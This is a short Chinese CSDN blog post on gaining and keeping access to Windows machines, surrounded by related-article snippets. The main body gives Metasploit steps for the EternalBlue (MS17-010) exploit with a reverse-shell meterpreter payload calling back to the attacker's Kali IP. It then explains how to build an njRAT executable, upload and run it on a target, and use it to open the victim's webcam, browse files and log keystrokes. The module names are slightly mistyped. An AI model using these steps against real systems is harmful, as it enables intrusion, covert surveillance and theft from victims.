web渗透--权限维持

最新推荐文章于 2024-04-14 17:05:10 发布
最新推荐文章于 2024-04-14 17:05:10 发布
阅读量171 收藏
点赞数
分类专栏: web渗透 黑客技术分享 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MysteriousMadness/article/details/108874406
版权

远程控制生成与上传

  • metasploit

msfcosle
search ms17-010
use exploit/windows/smb/ms170_010_eternablue
show options
设置rhosts
show payloads
set payload windows/x64/meterpreter/reverse_tcp 设置反弹shell
show options
set lhost kali-IP
exploit/run

远程控制

  • 使用njRAT v0.7d
  • 设置本地端口
  • 设置Builder(左下角)设置本地IP,然后生成exe
  • 把生成的exe通过kali上传到目标机器中,upload 文件目录 上传地址。
  • 运行上传的exe文件
  • 然后可以通过niRAT软件接收。
  • 然后可以打开摄像头,资源管理,键盘记录等
lao_wine
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透中的权限维持
anquanzushiye的博客
04-13 2815
当今时代,每时每刻都发生着新的重大数据泄露事件,对于个人Internet用户、公司和政府而言,重要的是要时刻意识到可能影响其系统的漏洞。SECSHI.COM提供了全方位的信息和工具,以...
渗透测试入门之Web权限维持
weixin_46236101的博客
09-24 407
前言 权限维持,在红蓝对抗中,我觉得其意义在于两点:一是防止已获取的权限被蓝队破坏;二是防止其他红队获取到相同的权限(虽然有点缺德。。。)。 其他情况下的非法用途就不说了。 权限维持的原则我觉得就是不能影响原来业务的正常运行。(比如改后台密码导致管理员不能登录,修改文件夹读写权限导致正常的文件不能上传等等)。 后台权限维持 当我们通过弱口令或爆破获取到后台权限,为了防止管理员修改密码或其他红队修改密码,失去权限,在这种情况下需要维持一下后台权限。 自己修改后台密码,当然是最笨的办法。 可以选择的方法,通过在
渗透测试之权限维持
qq_29864185的博客
07-01 1035
权限维持 在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。 Web后门 1:隐藏后门文件(将文件设置为隐藏) 2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。 <?php set_time_limit(0);//程序执行时间 ignore_user_abort(1);...
三大渗透框架权限维持
09-28 1049
在渗透测试中,有三个非常经典的渗透测试框架--Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用渗透框架获得持久...
微软服务器更新通知,产品技术-微软安全公告 MS17-010 Microsoft Windows SMB 服务器安全更新 (4013389)-新华三集团-H3C...
weixin_39687422的博客
08-06 1861
1漏洞信息:此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。2漏洞描述符:CVE: CVE-2017-0143、 CVE-2017-0144、 CVE-2017-0145、 CVE-2017-0146、 CVE-2017-0147、 CVE-2017-0148、 C...
Web渗透技术及实战案例解析
07-28
Web渗透技术是黑客技术的一个重要分支,主要指的是利用计算机网络技术,通过网络对目标Web应用进行安全检测、漏洞利用、权限提升等一系列攻击过程。Web渗透技术广泛应用于网络安全领域,包括安全研究、漏洞发现、...
web渗透测试详细入门实践课程-kali/sql注入
06-20
web渗透测试/渗透工具kali 渗透原理 渗透前期(网络踩点、网络扫描、网络查点) 渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透...
Web渗透笔记.pdf
08-04
本资源摘要信息为 Web 渗透笔记.pdf 的知识点总结,涵盖了 Web 渗透测试的整个过程,包括信息收集、漏洞利用、权限提升、权限维持、内网代理、内网收集、内网漏洞、横向移动、跨域攻击等方面。 信息收集 信息收集...
Web渗透技术及实战案例解析》
05-24
Web渗透技术是一种通过利用网站、网络应用程序和服务器的安全漏洞,获取未授权访问权限的技术。它属于信息安全的一个分支,专门针对网络层的安全。随着互联网的普及和网络应用的广泛使用,Web渗透技术的重要性日益...
微软的补丁服务器,Microsoft 安全公告 MS17-010 - 严重
weixin_35458961的博客
08-04 1144
10/11/2017本文内容MSRC ppDocument 模板Microsoft 安全公告 MS17-010 - 严重Microsoft Windows SMB 服务器安全更新 (4013389)发布日期:2017 年 3 月 14 日**版本:**1.0执行摘要此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的...
永恒之蓝MS17-010漏洞利用 writeup
二十四桥明月夜的博客
07-07 2850
MS17-010漏洞: MS17-010漏洞: • 一、 MS17-010漏洞公告及相关分析报告 •二、漏洞重现 •漏洞利用防范 • 一、 MS17-010漏洞公告及相关分析报告 ★MS17_010 漏洞攻击:曾经危害全球的勒索病毒利用的永恒之蓝漏洞。 公告 Microsoft 安全公告 MS17-010 - 严重 Microsoft Windows ...
微软服务器安全补丁,Microsoft Windows SMB服务器安全更新(4013389)补丁 官方勒索病毒漏洞修复版(图文)...
weixin_35725654的博客
08-09 4620
软件介绍Microsoft Windows SMB服务器安全更新(4013389)补丁是一款微软官方Microsoft安全公告 MS17-010 - 严重Microsoft Windows SMB 服务器安全更新(4013389)勒索病毒修复中文特别补丁,此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 WindowsSMBv1 服务器发送特殊设计的消息,那么其...
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
wwwwyyyrre的博客
04-22 2486
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
内网渗透-windows权限维持的方法
最新发布
lza20001103的博客
04-14 1307
内网渗透-windows权限维持的方法
SMB服务漏洞MS17-010渗透测试
sinat_41880528的博客
07-03 1万+
1.MS17-010漏洞简介     MS17-010是微软Windows 系统SMB协议的漏洞。由于某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程代码执行漏洞,远程Windows主机受到以下漏洞的影响:CVE-20170143,CVE-20170144,CVE-20170145,CVE-20170146,CVE-2017014...
后渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4382
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
热门推荐
ElsonHY的博客
11-22 8万+
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法前言0x01 准备工作0x02 漏洞利用0x03 修复方案总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,
全面指南:高效开源Web框架Portal-Basic 3.1.20130425
Portal-Basic是一款开源的Java Web应用开发框架,其3.1.20130425版本由BruceLiang开发并维护。这个框架旨在提供全面且高性能的解决方案,适用于各类Web应用开发。其核心优势包括: 1. **MVC和DAO框架**:内置了稳定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lao_wine

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值